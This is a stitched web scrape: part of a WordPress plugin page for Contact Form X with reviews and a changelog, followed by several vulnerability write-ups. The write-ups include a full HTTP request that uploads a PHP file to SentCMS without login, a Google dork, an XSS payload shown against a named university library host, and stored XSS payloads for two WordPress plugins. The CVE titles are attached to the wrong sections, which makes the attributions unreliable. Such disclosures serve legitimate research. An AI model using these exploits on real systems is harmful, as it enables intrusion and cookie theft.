6.  After seeing the success message, delete the draft page and shortcode

Using a temporary/draft page for the shortcode and then deleting it afterwards ensures that only YOU are making changes to the database. It is important to not display either of the above shortcodes publicly.

**Got a question?**

Send any questions or feedback via my contact form

![](https://secure.gravatar.com/avatar/d9adcb47896a57300a6ccbccd98014a9?s=60&d=retro&r=g)

Works great, feels fast and light.

![](https://secure.gravatar.com/avatar/5081c74020de48e16ee5c9385ef0a0f1?s=60&d=retro&r=g)

This form plugin is way better than contact form 7. I have a feature request. Plz load the css and js only in the page where the shortcode is used. I know there is a manual option available for that. But not every people notices that and site speed becomes slower because of shitty recaptcha js file.

![](https://secure.gravatar.com/avatar/b2246b9e0e00566cde0261e1d007a926?s=60&d=retro&r=g)

It just works, straight out of the box, and the emails go right to my inbox (not spam)! And it literally takes minutes to get it up and running! My old contact form stopped working (wasn’t developed anymore), and WPforms didn’t work (it only sent one test email to spam, then stopped working all together). Thank you so much Jeff!

![](https://secure.gravatar.com/avatar/6fff7999331de37636be6ae7f2db4a8a?s=60&d=retro&r=g)

Finally a good simple alternative. The only thing lacking is support for multiple forms and multilingual support

![](https://secure.gravatar.com/avatar/3996e7ae9113c8be2f0b278ba1505e41?s=60&d=retro&r=g)

I was looking for a simple contact form, i found it. I like "Targeted Loading" option: the plugin assets are only loaded on one page, the page where the form is used. You need only to add the page link of the contact form. The plugin setup is very easy, and include all the options that should have a contact form. Thank you Jeff Starr for this plugin.

![](https://secure.gravatar.com/avatar/7af69b1c06a459aae1ec040d99914e74?s=60&d=retro&r=g)

I love Contact Form X. It's as simple as it gets, but it's also possible to customise should you wish. If you're having issues with form spam, this plugin will sort it. I've used it on multiple WP sites with great results. Thanks Jeff!

Read all 25 reviews

“Contact Form X” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/f5b7d448eb7f9dd12b2f652be3ea5de5?s=32&d=mm&r=g) Jeff Starr

If you like CFX, please take a moment to give a 5-star rating. It is super appreciated and really helps to keep plugin development going strong.

**2.4.1 (2022/02/24)**

*   Improves security on plugin settings page (Thanks Vlad Ex.Mi)
*   Generates new default translation template
*   Tests on WordPress 5.9

**2.4 (2022/01/08)**

*   Improves loading of translations
*   Improves performance of plugin settings
*   Updates some links to external resources
*   Changes minimum required WP version to 4.6
*   Tests on WordPress 5.9

**2.3 (2021/07/12)**

*   Adds filter hook `contactformx_send_carbon_message`
*   Adds `.cfx-noscript-wrap` to `<noscript>`
*   Improves CSS for Dashboard widget
*   Improves CSS for success message
*   Improves CSS for plugin settings
*   Tests on WordPress 5.8

**2.2.1 (2021/02/12)**

*   Fixes bug with Email Recipient settings (Thanks @mbrsolution)
*   Tests on WordPress 5.7

**2.2 (2021/02/08)**

*   Fixes `call_user_func()` expects parameter 1 to be valid callback
*   Adds filter hook `contactformx_recaptcha_querystring`
*   Tests on WordPress 5.7

**2.1 (2020/11/08)**

*   Adds drag/drop ordering of form fields 🙂
*   Adds option to enable display of shortcodes in widgets
*   Adds option to display dashboard widget when user can `edit_post`
*   Adds filter hook `contactformx_textarea_maxlength`
*   Updates plugin script to account for changes in jQuery UI
*   Simplifies enqueue logic for plugin settings page
*   Improves form HTML and CSS for better validation
*   Replaces `linear-gradient(top` with `linear-gradient(to bottom`
*   Updates Help tab information
*   Updates default translation template
*   Improves display of settings page
*   Generates new default translation template
*   Tests on PHP 7.4 and 8.0
*   Tests on WordPress 5.6

**2.0 (2020/07/31)**

*   Changes default “From” address to “wordpress@yourdomain.com”
*   Adds options to display success message without the reset button
*   Fixes bug with fields not forgetting submitted values
*   Fine tunes the CFX dashboard widget
*   Updates contextual Help tab information
*   Generates new default translation template
*   Refines readme/documentation
*   Tests on WordPress 5.5

**1.9.2 (2020/06/08)**

*   Sets `exclude_from_search` to `true`
*   Tests on WordPress 5.4

**1.9.1 (2020/03/11)**

*   Fixes bug where dates not showing on dashboard widget
*   Tests on WordPress 5.4

**1.9 (2020/03/08)**

*   Adds option to disable storing email info in database
*   Replaces custom database table with custom post types
*   Adds Google reCaptcha v3 (hidden reCaptcha)
*   Updates Google reCaptcha version 2 library
*   Improves “Email Message Extra” option name and description
*   Improves sanitization of post data
*   Improves security of form cookies
*   Improves display of dashboard widget
*   Improves default button styles
*   Improves noscript display styles
*   Adds legacy functions for database
*   Fixes PHP warning for `contactformx_enqueue_resources_admin()`
*   Fixes incorrect URL for email icon
*   Updates infos in the plugin Help tab
*   Generates new default translation template
*   Tests on WordPress 5.4

**1.8 (2019/10/24)**

*   Updates styles for plugin settings page
*   Improves logic of `contactformx_maybe_enqueue()`
*   Generates new default translation template
*   Tests on WordPress 5.3

**1.7 (2019/09/02)**

*   Fixes bug with non-admin users
*   Fixes bug with default subject line
*   Fixes bug with carbon copy reply-to address
*   Adds support for autofill values on input fields
*   Tweaks function `contactformx_enable_data()`
*   Improves targeted enqueue scripts functionality
*   Renames `contactformx_send_headers` to `contactformx_mail_headers`
*   Generates new default translation template
*   Fine-tunes display of plugin page
*   Updates some links to https
*   Tests on WordPress 5.3 (alpha)

**1.6 (2019/04/28)**

*   Bumps minimum PHP version to 5.6.20
*   Updates default translation template
*   Tests on WordPress 5.2

**1.5 (2019/03/04)**

*   Bumps minimum PHP version to 5.3
*   Removes support for deprecated reCaptcha
*   Adds responsive styles for mobile browsers
*   Changes input type to email for email field
*   Simplifies “Additional Information” display
*   Bugfix: label and placeholder in reverse order
*   Tweaks plugin settings screen UI
*   Generates new default translation template
*   Tests on WordPress 5.2 (alpha)

**1.4 (2019/02/02)**

*   Just a version bump for compat with WP 5.1
*   Full update coming soon 🙂

**1.3 (2018/11/12)**

*   Adds homepage link to Plugins screen
*   Adds option to display “powered by CFX”
*   Improves display of CFX dashboard widget
*   Improves logic of `contactformx_print_js_vars_admin`
*   Improves logic of `contactformx_maybe_enqueue`
*   Updates default translation template
*   Tests on WordPress 5.0 (beta)

**1.2 (2018/08/13)**

*   Tweaks styles on plugin settings page
*   Replaces `wp_kses_post` with `wp_strip_all_tags` for style settings
*   Adds `rel="noopener noreferrer"` to all blank-target links
*   Updates donate link
*   Updates GDPR blurb
*   Adds option to customize invalid-email error message
*   Improves CSS for all form styles
*   Improves CSS for Dashboard widget
*   Adds “Rate Plugin” link to Advanced tab
*   Updates value of `CONTACTFORMX_HOME` constant
*   Regenerates default translation template
*   Further tests on WP versions 4.9 and 5.0 (alpha)

**1.1 (2018/06/07)**

*   Changes required to host plugin at WordPress.org

**1.0 (2018/06/05)**

*   Initial release

CVE-2022-25601: Contact Form X

sentcms 4.0.x allows remote attackers to cause arbitrary file uploads through an unauthorized file upload interface, resulting in php code execution in /admin/upload/upload.

****Google Dork:****

sentcms

****Exp methods :****

Vulnerability description: Arbitrary file uploads are possible without login

Vulnerability Location.

> /user/upload/upload
> 
> /admin/upload/upload

Both of the above interfaces are vulnerable to arbitrary file uploads

If the following page appears, a vulnerability exists

![image-20220206032920568](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220206032920568.png)

![image-20220206032944553](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220206032944553.png)

**Vulnerability recurrence：**

Modify the url at the pink arrow to be the home site, then post the package, and the successful upload will return the phpinfo connection

If you can’t upload, modify the time of the post package.

> The requested interface can be either “/user/upload/upload” or “/admin/upload/upload”

![image-20220204021956537](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220204021956537.png)

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  

POST /user/upload/upload HTTP/1.1  
Host: target.com  
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728  
Content-Length: 894  
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz  
Accept: \*/\*  
Origin: https://info.ziwugu.vip/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6  
Connection: close  
  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="id"  
  
WU\_FILE\_0  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="name"  
  
test.jpg  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="type"  
  
image/jpeg  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="lastModifiedDate"  
  
Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="size"  
  
164264  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="file"; filename="test.php"  
Content-Type: image/jpeg  
  
JFIF  
<?php phpinfo();?>  
  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz--  

![image-20220204021215525](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220204021215525.png)

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hanayuzu'Blog！

CVE-2022-24652: Sentcms任意文件上传漏洞

A cross-site scripting (XSS) vulnerability in the component cgi-bin/ej.cgi of Ex libris ALEPH 500 v18.1 and v20 allows attackers to execute arbitrary web scripts or HTML.

**1** we can search Wuhan University Library on Google and click  
![企业微信截图_16443782227933](https://user-images.githubusercontent.com/87362545/153117967-6afcec97-c7e4-4616-9779-759e33f08259.png)  
**2** then we click the E-journals of Resources  
![image](https://user-images.githubusercontent.com/87362545/153118421-ab0f4602-44dc-4945-a46c-be64740e56fc.png)  
**3** we click the search,then we can jump to new page  
![image](https://user-images.githubusercontent.com/87362545/153118686-ca90853d-53f0-4ed9-a141-444265c635aa.png)  
**4** enter payload in the search box : 12345" onmousemove="console.log(123)  
click the search box,then move the mouse over the search box,we can see log in the console  
![image](https://user-images.githubusercontent.com/87362545/153129160-18e97b91-e7d5-4662-9bf1-24d8501c32f7.png)  
**5** there is the data package of burpsuite  
![企业微信截图_1644385957881](https://user-images.githubusercontent.com/87362545/153130277-498d9bc9-da73-4bc0-9ff3-71dec5f9a0ed.png)  
GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1  
Host: sfx.lib.whu.edu.cn  
User-Agent: R0VrgaJmaBRV  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

Full URL of this vulnerability is :  
http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0

CVE-2022-24177: Ex libris_xss vulnerability · Issue #1 · zhao1231/cve_payload

A Cross-Site Scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user’s browser while the browser is connected to a trusted website. The attack targets your application's users and not the application itself while using your application as the attack's vehicle. The XSS payload executes whenever the user opens the login page of the WordPress application.

**Description**

A Cross-Site Scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user’s browser while the browser is connected to a trusted website. The attack targets your application's users and not the application itself while using your application as the attack's vehicle. The XSS payload executes whenever the user opens the login page of the WordPress application.

**Proof of concept: (POC)**

The following vulnerability was discovered in Customize Login Image version 3.4.

**Issue:** Stored Cross-Site Scripting

1.  Login to the WordPress application. 
    

**Note:** A virtual host (wptest.com) is used for testing the application locally.

2.  Install the Customize Login Image Plugin.
    
3.  Go to the ‘Settings’ menu and click on the ‘Customize Login Image’ drop list.
    

![](https://lh6.googleusercontent.com/wxBG0fqobiVAfwmWf68GoBxqTh687Yr8zjbOyWuCwpDJPlkmhiubVue9vW0b_Uc6o7mD50eMW06zhLLDU5MZfx1pOnYsWFdT7LY_Gd-8QJzqGKzR08dLBgDwHWDq-fVhBBF6l3hf)

_**Figure 01:** Customize Login Image Plugin_

4.  Enter the payload - <script>alert(document.cookie)</script> in the ‘Custom Logo Link’ field (cli\_logo\_url parameter).
    

![](https://lh5.googleusercontent.com/iExetqA6njC3Kp6settAgCX-S-_AOhTMEr9-XMVO3hZO4FW5zK7tDQy0pDhVZsy3Pt_YTo-KeEBb9iPNirOa0_4GrucUcLlujEAf1RLXPIO7yFVsdtkpQKSGGvT6JToaLJlsY9TQ)

_**Figure 02:** Entering encoded  XSS payload in the  ‘Custom Logo Link’ field_

5.  Click on the ‘Save Changes’ button
    
6.  Go to the WordPress login page at /wp-login.php .
    

![](https://lh5.googleusercontent.com/YVqC_kznpCKC2fIsu0WscoQPaIoCqj_WBgGQbax13yeDE9DkW-gSfBsIynBiN7M15mHm43cdiOadDKI6UC7pM_2U4VwMRx62ICSiyEPgkNv070Cu8OQYxFZ3vPARgEanMCDSTddj)

_**Figure 03:** Injected XSS payload is executed and displays an alert box containing the user’s cookies._

**Impact**

An attacker can perform the following:

*   Inject malicious code into the vulnerable variable and exploit the application through the Cross-Site Scripting vulnerability.
    
*   Modify the code and get the session information of other users.
    
*   Compromise the user machine.
    

**Remediations**

*   Perform context-sensitive encoding of entrusted input before echoing back to a browser using an encoding library throughout the application.
    
*   Implement input validation for special characters on all the variables are reflected in the browser and stored in the database.
    
*   Explicitly set the character set encoding for each page generated by the webserver.
    
*   Encode dynamic output elements and filter specific characters in dynamic elements.
    

![](https://lh6.googleusercontent.com/-GgfI9HNEOYjnnUnd2l1-CGB0nr581TxohRkZsrAd_yF30VMLc67Tl9A8r4gwfFjkGP4muloVgF8kGpAVkxun0uWZIqIZV9RIUCJTn-pSqhxOTfHohoQiH9mkw4vfgDv2kiIx18j)

_**Figure 04:** The default Cross-Site Scripting mitigation setting in wp.config file to prevent XSS attacks_

**Timeline**

**Nov 30, 2021:** Discovered in \`Customize Login Image version 3.4 \` Product

**Dec 2, 2021:** Reported to WordPress team

**Dec 7, 2021:** Vendor fixed the issue 

**Dec 7, 2021:** Vendor reopened the plugin for download

**Dec 10, 2021:** CVE assigned

**Discovered by**

Cyber Security Works Pvt. Ltd.

CVE-2021-33851: 2021-33851 - Stored Cross-Site Scripting in WordPress Customize Login Image

A cross-site scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. The application targets your application’s users and not the application itself, but it uses your application as the vehicle for the attack. The XSS payload executes whenever the user opens the Settings Page of the Post Duplicator Plugin or the application root page after duplicating any of the existing posts.

**Description**

A cross-site scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. The application targets your application’s users and not the application itself, but it uses your application as the vehicle for the attack. The XSS payload executes whenever the user opens the Settings Page of the Post Duplicator Plugin or the application root page after duplicating any of the existing posts.

**Proof of concept: (POC)**

The following vulnerability was discovered in Post-Duplicator Plugin 2.23.

**Issue:** Stored Cross-Site Scripting

**Note:** Here, localhost has been used for testing the application locally.

1.  Login to the WordPress application.
    
2.  Install Post Duplicator Plugin.
    
3.  Go to the ‘Tools’ menu of WordPress and click on the ‘Post Duplicator’ button.
    

![](https://lh3.googleusercontent.com/QSGTSkxpHtYXzC6_44_VMDL81kwYrsUK4RP99OdzU1xdrq__QHQz1U5IVcalcnf1-xDorKDZ1sAXb0OsNqSkphTWukdjNBOwdKVFul5evJ4VPhg9aqZAbPyQ_HZ6UkCYqmXGvydc)

_**Figure 01:** Post Duplicator Settings Page_

4.  Enter the payload - Duplicate Post”><script>alert(document.cookie)</script> in the ‘Duplicate Title’ field (mtphr\_post\_duplicator\_settings\[title\] parameter).
    

![](https://lh5.googleusercontent.com/Qp9YIp7qlrJKHtKnSAtbTb999fn4Vvn5JXIdhqjzuSb4T3i4fN2txY9jt0CJQiY-3yccxz3S1LNJSC1K0u75nB_NqFansSayPt1G1ubA4E6yDcSmp8gitNgc4OagyHQRiguhVZ42)

_**Figure 02:** Entering  XSS payload in the  ‘Duplicate Title’ field_

5.  Enter the payload - Hello World!”><script>alert(document.cookie)</script> in the ‘Duplicate Slug’ field (mtphr\_post\_duplicator\_settings\[slug\] parameter).
    

![](https://lh3.googleusercontent.com/dn9nzwSO-jGGhtlHGb6cBxvF2eHeFDscgBomrpJhHI_vaA4jcO9tb29dFCsR_W1XypspeNvg-2I0uUCFs5pQQuG5F-CTPG4HR_iZxsSckIaJt2uRBU2drj0wOZqROXi-l4jCf-Ca)

_**Figure 03:** Entering  XSS payload in the  ‘Duplicate Slug’ field_

6.  Click on the ‘Save Changes’ button to save changes.
    
7.  Go to the Post Duplicator Settings page at tools.php?page=mtphr\_post\_duplicator\_settings\_menu
    

![](https://lh3.googleusercontent.com/beng0VRzzbGOTB4UKvFiVbx2LFjKboENMN53n9wbXgyEmNXriK43sDA9cF1e7nu2bpJlP9sS_dk8vIxRa6WloalZaxfNeVpYsCSq580Vp1tupPez7mITeEzfuVLs36l7XCfQ2IwM)

_**Figure 04:** Injected XSS payload is executed displaying an alert box with the contents of the user’s cookies._

8.  Another use case of this vulnerability is when the post is duplicated after injecting the XSS payload in the settings page.
    

![](https://lh6.googleusercontent.com/-sy8iUEktq7O-xjQQ-VOvL-0t97RxpZZF3Qn26FsFeaxMuRrJrt3nFP8-gF9VbhaKIRxgFGcicyZn0O4FrgyTi53hTeZBZA6q-xZ2khg9R7mhviL5HoBU7RWuzuAbWOzIBBtMyow)

_**Figure 05:** Duplicate the “Hello world!” post_

9.  Once the post is duplicated, the title of the duplicated post will append the name we specified in the mtphr\_post\_duplicator\_settings\[title\] parameter.
    

![](https://lh6.googleusercontent.com/oYfXyogToFBqfEueM1bkD71qT_swzgkkkp2wkRu2M9rejet5zR8SuyRoEixutaI76a_nZFAuC19pxAesHe5MwkMKXPUs-vljC0O7QDb4_P6d0mbT7uMoFlgcKcAm-24YI3VVnWxo)

_**Figure 06:** Duplicated post with XSS Payload_

10.  Now navigate to the application root to view the posts.
    

![](https://lh4.googleusercontent.com/T9B4Jfc1r6AqY81w6FnpGnie-s9bbAUcRpY1va6yM4yTLG7s5rTQbZQ0sQNPn4uMBhUZ5Ipy0nnKPphwADz1r-YKUNfJEbJnlGBzBJ-k8HZLPqkQ9tv25JBNpvJPjLkKvhqow3Hl)

_**Figure 07:** Injected XSS payload is executed displaying an alert box with the contents of the user’s cookies._

![](https://lh6.googleusercontent.com/9f3Mngs6iFfrIJ_nhiyUIbsTYLTAH7SkSZSzUGi4Xs2OCxOll8SxTQcqatp6G7MZyUbPv6GRc9ImOpeBCWJJlziEMPvhJFD7xfCHoZej2TuMZcj5CBoIxmLhU4dlOfU2qsleMywG)

_**Figure 08:** The default cross-site scripting mitigation setting in wp.config file to prevent cross-site scripting attacks_ 

**Impact**

An attacker can perform the following: 

*   Inject malicious code into the vulnerable variable and exploit the application through the cross-site scripting vulnerability. 
    
*   Modify the code and get the session information of other users
    
*   Compromise the user machine.
    

**Remediations**

*   Perform context-sensitive encoding of entrusted input before it is echoed back to a browser using an encoding library throughout the application. 
    
*   Implement input validation for special characters on all the variables reflected in the browser and stored in the database. 
    
*   Explicitly set the character set encoding for each page generated by the webserver. 
    
*   Encode dynamic output elements and filter specific characters in dynamic elements.
    

**Timeline**

**Dec 28, 2021:** Discovered in \`Post Duplicator Plugin - 2.23\` Product

**Dec 29, 2021:** Reported to WordPress team

**Dec 31, 2021:** Vendor fixed the issue 

**Dec 31, 2021:** CSW assigned the CVE Identifier (CVE-2021-33852)

**Discovered by**

Cyber Security Works Pvt. Ltd.

Tag

#google